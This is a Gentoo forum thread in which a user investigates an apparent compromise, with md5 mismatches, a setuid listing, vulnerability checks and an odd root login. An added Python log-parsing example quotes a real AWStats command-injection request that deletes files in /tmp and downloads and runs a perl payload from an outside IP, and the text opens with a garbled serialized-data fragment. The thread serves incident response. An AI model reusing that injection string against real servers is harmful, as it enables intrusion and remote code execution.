i:28;i:18;i:29;i:19;i:30;i:22;i:31;i:
16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:
15;i:43;i:33;}i:0;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i
:11;i:0;i:12;i:28;i:13;i
:22;i:14;i:42;i:15;i:37;i:16;i:235;
i:17;i:30;i:18;i:68;i:19;i:72;i:20;i:68;i:21;i:74;i:22;i:43;i:23;i:46;i:24;i:24;i:25;i:37;i:26;i:37;i:27;i:28;
i:28;i:31;i:29;i:27;i:30;i:37;i:31;
i:44;i:32;i:38;i:33;i:29;i:34;i:83;i:35;i:24;i:36;i:56;i:37;i:71;i:38;i:27;i:39;i:31;i:40;i:45;i:41;i:31;i:42
;i:34;i:43;i:81;}s:1:"x";a:44:{i:0;s:5:"11.08";i:1;s:5:"12.08";i:2;s:5:"13.08";i:3;s:5:"14.08";i:4;s:5:"15.08";i:5;s:5:"16.08";i:6;s:5:
"17.08";i:7;s:5:"18.08";i:8;s:5:
"19.08";i:9;s:5:"20.08";i:10;s:5:"21.08";i:11;s:5:"22.08";i:12;s:5:"23.08";i:13;s:5:"24.08";i:14;s:5:"25
.08";i:15;s:5:"26.08";i:16;s:5:
"27.08";i:17;s:5:"28.08";i:18;s:5:"29.08";i:19;s:5:"30.08";i:20;s:5:"31.08";i:21;s:5:"01.09";i:22;s:5:"02.09";i:
23;s:5:"03.09";i:24;s:5:
"04.09";i:25;s:5:"05.09";i:26;s:5:"06.09";i:27;s:5:"07.09";i:28;s:5:"08.09";i:29;s:5:"09.09";i:30;s:5:"10.09";i
:31;s:5:"11.09";i:32;s:5:
"12.09";i:33;s:5:"13.09";i:34;s:5:"14.09";i:35;s:5:"15.09";i:36;s:5:"16.09";i:37;s:5:"17.09";i:38;s:5:"18.09";i:
39;s:5:"19.09";i:40;s:5:
"20.09";i:41;s:5:"21.09";i:42;s:5:"22.09";i:43;s:5:"23.09";}}

MD5SUM
I have over 1000 files that didn't match portage's !md5! check

Code: Select all

qpkg -v -v -c | grep "!md5!" | wc
including gcc/glibc, netstat, ping & a couple of /usr/linux/ C code files.

chkrootkit found 0 rootkits,
but it's terribly old/outdated & LAME & static


SETUID/SETGID files
found some suspicious KDE SETUID files:

Code: Select all

-rws--x--x  1 root 30420 aoû 23 05:47 /bin/su
-rwsr-x--x  1 root 31056 oct 28  2004 /bin/ping
-rws--x--x  1 root 71684 fév  3  2005 /bin/mount
-rws--x--x  1 root 24752 oct 28  2004 /bin/ping6
-rws--x--x  1 root 32296 aoû 23 05:47 /bin/passwd
-rws--x--x  1 root 39848 fév  3  2005 /bin/umount
-rwxr-sr-x  1 zendtech 237732 oct  1 16:59 /opt/Zend/sbin/ini_modifier
-r-s--x--x  1 root 12608 aoû 27 23:36 /opt/vmware/bin/vmware-ping
-r-sr-xr-x  1 root 4714 aoû 27 23:36 /opt/vmware/bin/vmware
-rws--x--x  1 root 3636940 aoû 27 23:36 /opt/vmware/lib/bin/vmware-vmx
-rws--x--x  1 root 756668 jun 16 18:20 /usr/bin/gpg
-rws--x--x  1 root 49988 jui  5 03:43 /usr/bin/ksu
-r-xr-s--x  1 man 50796 sep 28 14:19 /usr/bin/man
-rws--x--x  1 root 2171160 oct  3 21:52 /usr/bin/Xorg
-rws--x--x  1 root 35524 aoû 23 05:47 /usr/bin/chfn
-rws--x--x  1 root 31520 aoû 23 05:47 /usr/bin/chsh
---s--x--x  1 root 93084 fév 11  2005 /usr/bin/sudo
-rws--x--x  1 lp 11904 mar 20  2005 /usr/bin/lppasswd
-rws--x---  1 cron 33644 mai 16 07:00 /usr/bin/crontab
-rws--x--x  1 root 41104 aoû 23 05:47 /usr/bin/chage
-rwsr-xr-x  1 root 17132 jan 30  2005 /usr/bin/eject #(setuid by me to eject USB media device easier)
-rwxr-s--x  1 tty 10652 fév  3  2005 /usr/bin/write
-rwxr-s--x  1 mail 9564 jun 11 16:36 /usr/bin/dotlock
-rwx--s--x  1 slocate 32904 fév 19  2005 /usr/bin/slocate
-rws--x--x  1 root 220424 fév 14  2005 /usr/bin/xscreensaver
---s--x--x  1 root 18876 fév 13  2005 /usr/bin/mount.cifs
-rws--x--x  1 root 24540 aoû 23 05:47 /usr/bin/expiry
-rws--x--x  1 root 26140 aoû 23 05:47 /usr/bin/newgrp
-rws--x--x  1 root 43648 aoû 23 05:47 /usr/bin/gpasswd
-rwxr-s--x  1 utmp 301020 fév 11  2005 /usr/bin/screen
---s--x--x  1 root 11280 fév 13  2005 /usr/bin/smbmnt
---s--x--x  1 root 9012 fév 13  2005 /usr/bin/smbumount
-rwxr-s--x  1 root 16000 jun 12 17:30 /usr/bin/lockfile
-rwxr-s--x  1 mail 38796 jun 14 18:23 /usr/bin/mutt_dotlock
-rws--s--x  1 root 78240 jun 12 17:30 /usr/bin/procmail
-rws--x--x  1 root 692688 mar 19  2005 /usr/kde/3.3/bin/kppp
-rws--s--x  1 root 61028 mar 19  2005 /usr/kde/3.3/bin/reslisa
-rws--x--x  1 root 702788 aoû 25 00:01 /usr/kde/3.4/bin/kppp
-rws--x--x  1 root 61148 aoû 25 00:01 /usr/kde/3.4/bin/reslisa
-rws--x--x  1 root 10997 jun 22 00:28 /usr/kde/3.4/bin/fileshareset
-rws--x--x  1 root 7692 jun 22 00:28 /usr/kde/3.4/bin/kgrantpty
-rws--x--x  1 root 6920 sep 10 10:43 /usr/kde/3.4/bin/artswrapper
-rwxr-s--x  1 nogroup 76468 jun 22 02:29 /usr/kde/3.4/bin/kdesud
-rws--x--x  1 root 14192 jun 22 02:29 /usr/kde/3.4/bin/kcheckpass
-rws--x--x  1 root 8036 jun 22 00:28 /usr/kde/3.4/bin/kpac_dhcp_helper
-rws--x--x  1 root 11788 aoû 23 07:25 /usr/lib/misc/glibc/pt_chown
-rws--x--x  1 root 152896 avr  4  2005 /usr/lib/misc/ssh-keysign
-rws--x---  1 squid 17452 mai 16 09:38 /usr/lib/squid/pam_auth
-rws--x---  1 squid 17796 mai 16 09:38 /usr/lib/squid/ncsa_auth
-r-s--x--x  1 root 18264 aoû 23 05:41 /usr/sbin/unix_chkpwd
-rwsr-xr-x  1 root 28512 fév 11  2005 /usr/sbin/fping
-rws--x---  1 wheel 20620 jun 25 20:33 /usr/sbin/traceroute
-rwxr-sr-x  1 postdrop 106348 jun 12 17:57 /usr/sbin/postdrop
-rws--x---  1 apache 13448 sep 25 08:43 /usr/sbin/suexec2
-rwxr-sr-x  1 postdrop 128244 jun 12 17:57 /usr/sbin/postqueue
-rws--x--x  1 root 11932 fév  1  2005 /usr/sbin/gnome-pty-helper
-rwxr-s--x  1 utmp 8312 mar 13  2005 /usr/sbin/utempter
-rwxr-s--x  1 mail 9476 jun 15 20:23 /usr/libexec/camel-lock-helper-1.2
-rws--x--x  1 mail 24104 jun 11 16:36 /usr/libexec/mail.local
-rwxr-s--x  1 utmp 9804 jan 31  2005 /usr/libexec/gnome-pty-helper
-rwsr-sr-t  1 users 0 jan  8  2005 /home/pbx06/.superkaramba/.lock
LISTENING ports
Everything seems OK except for
dnsmasq, which is a light DNS server: it is also listening on eth0/*:33493

glsa-check'ing the BOX
only awstats seems to be exploitable

Code: Select all

glsa-check -l | grep '\[N\]'
WARNING: This tool is completely new and not very tested, so it should not be
used on production systems. It's mainly a test tool for the new GLSA release
and distribution system, it's functionality will later be merged into emerge
and equery.
Please read http://www.gentoo.org/proj/en/portage/glsa-integration.xml
before using this tool AND before reporting a bug.

[N] indicates that the system might be affected.
200509-01 [N] MPlayer: Heap overflow in ad_pcm.c ( media-video/mplayer )
200509-06 [N] Squid: Denial of Service vulnerabilities ( net-proxy/squid )
200509-08 [N] Python: Heap overflow in the included PCRE library ( dev-lang/python )
200509-10 [N] Mailutils: Format string vulnerability in imap4d ( net-mail/mailutils )
200509-13 [N] Clam AntiVirus: Multiple vulnerabilities ( app-antivirus/clamav )
200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )
200509-18 [N] Qt: Buffer overflow in the included zlib library ( x11-libs/qt )
200510-04 [N] Texinfo: Insecure temporary file creation ( sys-apps/texinfo )
200506-22 [N] sudo: Arbitrary command execution ( app-admin/sudo )
200506-23 [N] Clam AntiVirus: Denial of Service vulnerability ( app-antivirus/clamav )
200508-01 [N] Compress::Zlib: Buffer overflow ( dev-perl/Compress-Zlib )
200508-04 [N] Netpbm: Arbitrary code execution in pstopnm ( media-libs/netpbm )
200508-07 [N] AWStats: Arbitrary code execution using malicious Referrer information ( net-www/awstats )
200508-08 [N] Xpdf, Kpdf, GPdf: Denial of Service vulnerability ( kde-base/kdegraphics app-text/xpdf app-text/gpdf ... )
200508-17 [N] libpcre: Heap integer overflow ( dev-libs/libpcre )
200508-19 [N] lm_sensors: Insecure temporary file creation ( sys-apps/lm_sensors )
200507-04 [N] RealPlayer: Heap overflow vulnerability ( media-video/realplayer )
200507-10 [N] Ruby: Arbitrary command execution through XML-RPC ( dev-lang/ruby )
200507-11 [N] MIT Kerberos 5: Multiple vulnerabilities ( app-crypt/mit-krb5 )
200507-16 [N] dhcpcd: Denial of Service vulnerability ( net-misc/dhcpcd )
200507-17 [N] Mozilla Thunderbird: Multiple vulnerabilities ( mail-client/mozilla-thunderbird mail-client/mozilla-thunderbird-bin )
200507-21 [N] fetchmail: Buffer Overflow ( net-mail/fetchmail )
200507-22 [N] sandbox: Insecure temporary file handling ( sys-apps/sandbox )
200507-23 [N] Kopete: Vulnerability in included Gadu library ( kde-base/kdenetwork kde-base/kopete )
200507-25 [N] Clam AntiVirus: Integer overflows ( app-antivirus/clamav )
200507-27 [N] Ethereal: Multiple vulnerabilities ( net-analyzer/ethereal )
/var/log/wtmp
found one weird line: root logged in from an unknown box:

Code: Select all

last -a |grep root |less
root     pts/9        Sun Sep 18 14:15 - 21:03 (1+06:47)    noc.au.SOME-HOSTNAME.net
What a pain to dig through all those log files: pop/smtpd/httpd/ftpd/sshd all have a different file format.
ANY suggestions?

mod edit: inserted linebreak \ for page formatting --Earthwings
Last edited by linux_girl on Thu Oct 06, 2005 3:49 am, edited 3 times in total.
:D :D
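On the question of digging through logs in several formats: the usual answer is to normalise each source to (timestamp, source, actor, detail) and sort, so the apache-owned /tmp files, the attack requests and the odd root login sit on one timeline. This is an added example, not code from the thread; the sample lines are copied from or modelled on the ones posted above. `last` and `ls` print no year for recent entries, so ASSUMED_YEAR is taken from the thread's date; every timestamp is treated as naive local time of the box (the +0200 in Apache lines is dropped); and because the listing above is from a French locale, the French month abbreviations are mapped alongside the English ones.

```python
"""Merge Apache access_log lines, `last -a` output and `find -exec ls -gl`
listings into one time-ordered timeline.

Added example, not code from the thread. Lines in a format the parser does not
know (including ls entries old enough to print a year instead of a time) are
skipped rather than guessed at.
"""
import re
from datetime import datetime

ASSUMED_YEAR = 2005   # assumed: `last` and `ls` omit the year for recent entries

MONTHS = {m: i for i, m in enumerate(
    ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'], 1)}
MONTHS.update({'fév': 2, 'avr': 4, 'mai': 5, 'jui': 7, 'aoû': 8, 'déc': 12})   # French locale

APACHE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>\d\d/\w{3}/\d{4}:\d\d:\d\d:\d\d)[^\]]*\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3})')
LAST_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<tty>\S+)\s+\w{3} (?P<mon>\w{3})\s+(?P<day>\d+) (?P<hm>\d\d:\d\d)'
    r' - (?P<end>\S+)\s+\([^)]*\)\s+(?P<host>\S+)$')
LS_RE = re.compile(
    r'^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<user>\S+)\s+(?P<group>\S+)\s+(?P<size>\S+)'
    r'\s+(?P<mon>\S+)\s+(?P<day>\d+)\s+(?P<hm>\d\d:\d\d)\s+(?P<path>\S+)$')


def _stamp(mon, day, hm):
    """Build a datetime from month name, day and HH:MM using the assumed year."""
    hour, minute = map(int, hm.split(':'))
    return datetime(ASSUMED_YEAR, MONTHS[mon.lower()], int(day), hour, minute)


def parse_event(line):
    """Return (when, source, actor, detail) for a recognised line, else None."""
    m = APACHE_RE.match(line)
    if m:
        when = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S')
        return when, 'apache', m.group('client'), f"{m.group('status')} {m.group('req')}"
    m = LAST_RE.match(line)
    if m:
        when = _stamp(m.group('mon'), m.group('day'), m.group('hm'))
        return when, 'last', m.group('user'), f"login on {m.group('tty')} from {m.group('host')}"
    m = LS_RE.match(line)
    if m:
        when = _stamp(m.group('mon'), m.group('day'), m.group('hm'))
        return when, 'ls', m.group('user'), f"{m.group('mode')} {m.group('size')} {m.group('path')}"
    return None


def timeline(lines):
    """Parse every line in a known format and return the events sorted by time."""
    events = [e for e in map(parse_event, lines) if e]
    events.sort(key=lambda e: e[0])
    return events


SAMPLE = [
    # apache-owned file in /tmp (copied from the listing above)
    '-rw-------  1 apache apache 2,0K sep 14 04:24 /tmp/sess_8906480466f77adf635dea22987e2169',
    # the odd root login (copied from the wtmp excerpt above)
    'root     pts/9        Sun Sep 18 14:15 - 21:03 (1+06:47)    noc.au.SOME-HOSTNAME.net',
    # the request that got a 200 (copied from the access_log excerpt above)
    '203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET /awstats/awstats.pl?configdir='
    '|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;'
    'echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # apache-owned file older than the attack (copied from the listing above)
    '-rw-------  1 apache apache    7 sep 11 11:41 /tmp/sess_62717f9c3a213dba20a89d94c84af0cf',
    # constructed, modelled on the setuid listing: old enough that ls prints a year, so skipped
    '-rws--x--x  1 root root 71684 fév  3  2005 /bin/mount',
    'this line is in no format the parser knows',
]

if __name__ == '__main__':
    for when, source, actor, detail in timeline(SAMPLE):
        print(when.isoformat(sep=' '), f'{source:6}', f'{actor:16}', detail)
```

Feed it `zcat` output, `last -a`, and the `find / -group 81 -exec ls -gl` listing together, and the first thing the sorted output makes visible is which apache-owned files predate the first logged attack request.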

Re: Permission denied

Post by linux_girl » Thu Oct 06, 2005 3:34 am

newtonian wrote: I tested to see if I could run executables from the tmp directory.
[...]
I couldn't :D

util-linux has a flaw: when a user re-mounts a partition it loses the nosuid,noexec,... options
200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )
:D :D

Post by Bob P » Sun Oct 23, 2005 8:06 am

linux_girl wrote: 2) Just wondering how the hell they knew about my awstats setup. I mean, you can't find my awstats URL on any search engine!
I doubt that the bad guys even care to know whether or not you have an AWStats implementation running on your server when they attack it with a script exploit. I think that they just apply a very simple brute-strength approach rather than applying knowledge specific to your system: the bad guys just crawl the web pinging for responses on port 80. Their software pays attention when a site responds as yours did; when they find a server on port 80 they apply the worm as an HTML request, indifferent to whether you have awstats running or not. If you DO have AWStats running with PHP enabled, then they exploit your box. If you don't, then they don't, and they move along. It's pretty simple, really. It amounts to nothing more complex than picking the low-hanging fruit. :idea:

My HTTP server logs show that I'm hit by requests from those worms all the time. They never get in, but the logs still show them trying. Maybe you should disable PHP in awstats, and generate your reports in a cron job instead. :idea:

PS - could somebody fix the page formatting problem?